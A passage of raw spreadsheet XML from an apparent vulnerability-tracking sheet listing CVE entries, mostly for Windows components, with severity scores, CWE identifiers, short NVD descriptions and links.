CWE-522, CWE-73</t></is></c><c r="S751" s="5" t="inlineStr"><is><t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="T751" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t></is></c></row><row r="752"><c r="A752" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B752" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C752" s="5" t="inlineStr"><is><t>CVE-2026-69809</t></is></c><c r="D752" s="5" t="n"><v>7.5</v></c><c r="E752" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F752" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G752" s="5" t="inlineStr" /><c r="H752" s="5" t="n"><v>0.011</v></c><c r="I752" s="5" t="inlineStr" /><c r="J752" s="5" t="inlineStr" /><c r="K752" s="5" t="inlineStr" /><c r="L752" s="5" t="inlineStr" /><c r="M752" s="5" t="inlineStr" /><c r="N752" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P752" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q752" s="5" t="inlineStr" /><c r="R752" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S752" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T752" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t></is></c></row><row r="753"><c r="A753" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B753" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C753" s="5" t="inlineStr"><is><t>CVE-2026-69852</t></is></c><c r="D753" s="5" t="n"><v>7.5</v></c><c r="E753" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F753" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G753" s="5" t="inlineStr" /><c r="H753" s="5" t="n"><v>0.006</v></c><c r="I753" s="5" t="inlineStr" /><c r="J753" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K75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53" s="5" t="inlineStr" /><c r="M753" s="5" t="inlineStr" /><c r="N753" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O753" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P753" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q753" s="5" t="inlineStr" /><c r="R753" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S753" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T753" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t></is></c></row><row r="754"><c r="A754" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B754" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C754" s="5" t="inlineStr"><is><t>CVE-2026-69881</t></is></c><c r="D754" s="5" t="n"><v>7.5</v></c><c r="E754" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F754" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G754" s="5" t="inlineStr" /><c r="H754" s="5" t="n"><v>0.012</v></c><c r="I754" s="5" t="inlineStr" /><c r="J754" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K754"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754" s="5" t="inlineStr" /><c r="M754" s="5" t="inlineStr" /><c r="N754" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O754" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P754" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q754" s="5" t="inlineStr" /><c r="R754" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S754" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T754" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t></is></c></row><row r="755"><c r="A755" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B755" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C755" s="5" t="inlineStr"><is><t>CVE-2026-69890</t></is></c><c r="D755" s="5" t="n"><v>7.5</v></c><c r="E755" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F755" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G755" s="5" t="inlineStr" /><c r="H755" s="5" t="n"><v>0.003</v></c><c r="I755" s="5" t="inlineStr" /><c r="J755" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K755"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755" s="5" t="inlineStr" /><c r="M755" s="5" t="inlineStr" /><c r="N755" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O755" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P755" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q755" s="5" t="inlineStr" /><c r="R755" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S755" s="5" t="inlineStr"><is><t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T755" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t></is></c></row><row r="756"><c r="A756" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B756" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C756" s="5" t="inlineStr"><is><t>CVE-2026-69929</t></is></c><c r="D756" s="5" t="n"><v>7.5</v></c><c r="E756" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G756" s="5" t="inlineStr" /><c r="H756" s="5" t="n"><v>0.008</v></c><c r="I756" s="5" t="inlineStr" /><c r="J756" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K756" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L756" s="5" t="inlineStr" /><c r="M756" s="5" t="inlineStr" /><c r="N756" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O756" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P756" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q756" s="5" t="inlineStr" /><c r="R756" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S756" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T756" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t></is></c></row><row r="757"><c r="A757" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B757" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C757" s="5" t="inlineStr"><is><t>CVE-2026-69930</t></is></c><c r="D757" s="5" t="n"><v>7.5</v></c><c r="E757" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G757" s="5" t="inlineStr" /><c r="H757" s="5" t="n"><v>0.008</v></c><c r="I757" s="5" t="inlineStr" /><c r="J757" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K757" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L757" s="5" t="inlineStr" /><c r="M757" s="5" t="inlineStr" /><c r="N757" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O757" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P757" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q757" s="5" t="inlineStr" /><c r="R757" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S757" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T757" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t></is></c></row><row r="758"><c r="A758" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B758" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C758" s="5" t="inlineStr"><is><t>CVE-2026-70065</t></is></c><c r="D758" s="5" t="n"><v>7.5</v></c><c r="E758" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F758" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G758" s="5" t="inlineStr" /><c r="H758" s="5" t="n"><v>0.012</v></c><c r="I758" s="5" t="inlineStr" /><c r="J758" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K758" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L758" s="5" t="inlineStr" /><c r="M758" s="5" t="inlineStr" /><c r="N758" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O758" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P758" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q758" s="5" t="inlineStr" /><c r="R758" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="S758" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T758" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t></is></c></row><row r="759"><c r="A759" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B759" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C759" s="5" t="inlineStr"><is><t>CVE-2026-70124</t></is></c><c r="D759" s="5" t="n"><v>7.5</v></c><c r="E759" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G759" s="5" t="inlineStr" /><c r="H759" s="5" t="n"><v>0.008</v></c><c r="I759" s="5" t="inlineStr" /><c r="J759" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K759" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L759" s="5" t="inlineStr" /><c r="M759" s="5" t="inlineStr" /><c r="N759" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O759" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P759" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q759" s="5" t="inlineStr" /><c r="R759" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S759" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T759" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t></is></c></row><row r="760"><c r="A760" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B760" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C760" s="5" t="inlineStr"><is><t>CVE-2026-70570</t></is></c><c r="D760" s="5" t="n"><v>7.5</v></c><c r="E760" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F760" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G760" s="5" t="inlineStr" /><c r="H760" s="5" t="n"><v>0.004</v></c><c r="I760" s="5" t="inlineStr" /><c r="J760" s="5" t="inlineStr" /><c r="K760" s="5" t="inlineStr" /><c r="L760" s="5" t="inlineStr" /><c r="M760" s="5" t="inlineStr" /><c r="N760" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O760" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P760" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q760" s="5" t="inlineStr" /><c r="R760" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S760" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T760" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t></is></c></row><row r="761"><c r="A761" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B761" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C761" s="5" t="inlineStr"><is><t>CVE-2026-70579</t></is></c><c r="D761" s="5" t="n"><v>7.5</v></c><c r="E761" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F761" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G761" s="5" t="inlineStr" /><c r="H761" s="5" t="n"><v>0.01</v></c><c r="I761" s="5" t="inlineStr" /><c r="J761" s="5" t="inlineStr" /><c r="K761" s="5" t="inlineStr" /><c r="L761" s="5" t="inlineStr" /><c r="M761" s="5" t="inlineStr" /><c r="N761" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P761" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q761" s="5" t="inlineStr" /><c r="R761" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S761" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T761" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t></is></c></row><row r="762"><c r="A762" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B762" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C762" s="5" t="inlineStr"><is><t>CVE-2026-70587</t></is></c><c r="D762" s="5" t="n"><v>7.5</v></c><c r="E762" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F762" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G762" s="5" t="inlineStr" /><c r="H762" s="5" t="n"><v>0.008</v></c><c r="I762" s="5" t="inlineStr" /><c r="J762" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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62" s="5" t="inlineStr" /><c r="M762" s="5" t="inlineStr" /><c r="N762" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O762" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P762" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q762" s="5" t="inlineStr" /><c r="R762" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="S762" s="5" t="inlineStr"><is><t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T762" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t></is></c></row><row r="763"><c r="A763" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B763" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C763" s="5" t="inlineStr"><is><t>CVE-2026-71330</t></is></c><c r="D763" s="5" t="n"><v>7.5</v></c><c r="E763" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F763" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G763" s="5" t="inlineStr" /><c r="H763" s="5" t="n"><v>0.008</v></c><c r="I763" s="5" t="inlineStr" /><c r="J763" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K76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763" s="5" t="inlineStr" /><c r="M763" s="5" t="inlineStr" /><c r="N763" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O763" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P763" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q763" s="5" t="inlineStr" /><c r="R763" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S763" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T763" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71330</t></is></c></row><row r="764"><c r="A764" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B764" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C764" s="5" t="inlineStr"><is><t>CVE-2026-72923</t></is></c><c r="D764" s="5" t="n"><v>7.5</v></c><c r="E764" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F764" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G764" s="5" t="inlineStr" /><c r="H764" s="5" t="n"><v>0.012</v></c><c r="I764" s="5" t="inlineStr" /><c r="J764" s="5" t="inlineStr" /><c r="K764" s="5" t="inlineStr" /><c r="L764" s="5" t="inlineStr" /><c r="M764" s="5" t="inlineStr" /><c r="N764" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O764" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P764" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q764" s="5" t="inlineStr" /><c r="R764" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S764" s="5" t="inlineStr"><is><t>In Microsoft.OpenApi.YamlReader from 2.0.0-preview.11 until 2.12.0 and from 3.0.0 until 3.10.0, and in Microsoft.OpenApi.Readers prior to 1.6.30, a small YAML OpenAPI document containing nested anchors and aliases can cause uncontrolled resource consumption when parsed through the public YAML reader APIs. YAML is parsed through SharpYaml, which represents aliases as shared nodes in a directed acyclic graph, so the parsed YAML graph stays small, but converting that graph to System.Text.Json.Nodes.JsonNode requires every alias to be materialized as an independent node because a JsonNode cannot be attached to multiple parents. Without a bound on that conversion work, a document with N nested anchors each referenced k times can require k^N materialized JSON nodes, leading to excessive memory allocation and process termination through out-of-memory conditions, a billion laughs style denial of service. The patched versions bound the YAML-to-JSON conversion by node count and nesting depth and report an OpenApiDiagnostic error instead of expanding without limit. This vulnerability is fixed in Microsoft.OpenApi.YamlReader 2.12.0 and 3.10.0, and Microsoft.OpenApi.Readers 1.6.30.</t></is></c><c r="T764" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72923</t></is></c></row><row r="765"><c r="A765" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B765" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C765" s="5" t="inlineStr"><is><t>CVE-2026-72928</t></is></c><c r="D765" s="5" t="n"><v>7.5</v></c><c r="E765" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F765" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G765" s="5" t="inlineStr" /><c r="H765" s="5" t="n"><v>0.006</v></c><c r="I765" s="5" t="inlineStr" /><c r="J765" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K765" s="5" t="inlineStr"><is><t>microsoft:windows_server_2025</t></is></c><c r="L765" s="5" t="inlineStr" /><c r="M765" s="5" t="inlineStr" /><c r="N765" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O765" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P765" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q765" s="5" t="inlineStr" /><c r="R765" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S765" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t></is></c><c r="T765" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72928</t></is></c></row><row r="766"><c r="A766" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B766" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C766" s="5" t="inlineStr"><is><t>CVE-2026-72932</t></is></c><c r="D766" s="5" t="n"><v>7.5</v></c><c r="E766" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F766" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G766" s="5" t="inlineStr" /><c r="H766" s="5" t="n"><v>0.01</v></c><c r="I766" s="5" t="inlineStr" /><c r="J766" s="5" t="inlineStr" /><c r="K766" s="5" t="inlineStr" /><c r="L766" s="5" t="inlineStr" /><c r="M766" s="5" t="inlineStr" /><c r="N766" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P766" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q766" s="5" t="inlineStr" /><c r="R766" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S766" s="5" t="inlineStr"><is><t>Buffer over-read in Windows Message Queuing Queue Manager allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T766" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72932</t></is></c></row><row r="767"><c r="A767" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B767" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C767" s="5" t="inlineStr"><is><t>CVE-2026-72943</t></is></c><c r="D767" s="5" t="n"><v>7.5</v></c><c r="E767" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F767" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G767" s="5" t="inlineStr" /><c r="H767" s="5" t="n"><v>0.006</v></c><c r="I767" s="5" t="inlineStr" /><c r="J767" s="5" t="inlineStr" /><c r="K767" s="5" t="inlineStr" /><c r="L767" s="5" t="inlineStr" /><c r="M767" s="5" t="inlineStr" /><c r="N767" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O767" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P767" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q767" s="5" t="inlineStr" /><c r="R767" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S767" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T767" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72943</t></is></c></row><row r="768"><c r="A768" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B768" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C768" s="5" t="inlineStr"><is><t>CVE-2026-72949</t></is></c><c r="D768" s="5" t="n"><v>7.5</v></c><c r="E768" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F768" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G768" s="5" t="inlineStr" /><c r="H768" s="5" t="n"><v>0.011</v></c><c r="I768" s="5" t="inlineStr" /><c r="J768" s="5" t="inlineStr" /><c r="K768" s="5" t="inlineStr" /><c r="L768" s="5" t="inlineStr" /><c r="M768" s="5" t="inlineStr" /><c r="N768" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P768" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q768" s="5" t="inlineStr" /><c r="R768" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S768" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows SMB Server Network Transport Driver (srvnet.sys) allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T768" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72949</t></is></c></row><row r="769"><c r="A769" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B769" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C769" s="5" t="inlineStr"><is><t>CVE-2026-72954</t></is></c><c r="D769" s="5" t="n"><v>7.5</v></c><c r="E769" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F769" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G769" s="5" t="inlineStr" /><c r="H769" s="5" t="n"><v>0.006</v></c><c r="I769" s="5" t="inlineStr" /><c r="J769" s="5" t="inlineStr" /><c r="K769" s="5" t="inlineStr" /><c r="L769" s="5" t="inlineStr" /><c r="M769" s="5" t="inlineStr" /><c r="N769" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O769" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P769" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q769" s="5" t="inlineStr" /><c r="R769" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S769" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an authorized attacker to execute code over a network.</t></is></c><c r="T769" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72954</t></is></c></row><row r="770"><c r="A770" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B770" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C770" s="5" t="inlineStr"><is><t>CVE-2026-72989</t></is></c><c r="D770" s="5" t="n"><v>7.5</v></c><c r="E770" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F770" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G770" s="5" t="inlineStr" /><c r="H770" s="5" t="n"><v>0.008</v></c><c r="I770" s="5" t="inlineStr" /><c r="J770" s="5" t="inlineStr" /><c r="K770" s="5" t="inlineStr" /><c r="L770" s="5" t="inlineStr" /><c r="M770" s="5" t="inlineStr" /><c r="N770" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P770" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q770" s="5" t="inlineStr" /><c r="R770" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S770" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Windows Failover Cluster allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T770" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72989</t></is></c></row><row r="771"><c r="A771" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B771" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C771" s="5" t="inlineStr"><is><t>CVE-2026-73017</t></is></c><c r="D771" s="5" t="n"><v>7.5</v></c><c r="E771" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F771" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G771" s="5" t="inlineStr" /><c r="H771" s="5" t="n"><v>0.002</v></c><c r="I771" s="5" t="inlineStr" /><c r="J771" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K771"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771" s="5" t="inlineStr" /><c r="M771" s="5" t="inlineStr" /><c r="N771" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O771" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P771" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q771" s="5" t="inlineStr" /><c r="R771" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S771" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Graphics Kernel allows an authorized attacker to execute code locally.</t></is></c><c r="T771" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-73017</t></is></c></row><row r="772"><c r="A772" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B772" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C772" s="5" t="inlineStr"><is><t>CVE-2026-75998</t></is></c><c r="D772" s="5" t="n"><v>7.5</v></c><c r="E772" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F772" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G772" s="5" t="inlineStr" /><c r="H772" s="5" t="n"><v>0.006</v></c><c r="I772" s="5" t="inlineStr" /><c r="J772" s="5" t="inlineStr" /><c r="K772" s="5" t="inlineStr" /><c r="L772" s="5" t="inlineStr" /><c r="M772" s="5" t="inlineStr" /><c r="N772" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O772" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P772" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q772" s="5" t="inlineStr" /><c r="R772" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S772" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could exploit this vulnerability to access sensitive files and directories outside the intended access scope. Exploitation of this issue does not require user interaction.</t></is></c><c r="T772" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75998</t></is></c></row><row r="773"><c r="A773" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B773" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C773" s="5" t="inlineStr"><is><t>CVE-2026-77101</t></is></c><c r="D773" s="5" t="n"><v>7.5</v></c><c r="E773" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F773" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G773" s="5" t="inlineStr" /><c r="H773" s="5" t="n"><v>0.003</v></c><c r="I773" s="5" t="inlineStr" /><c 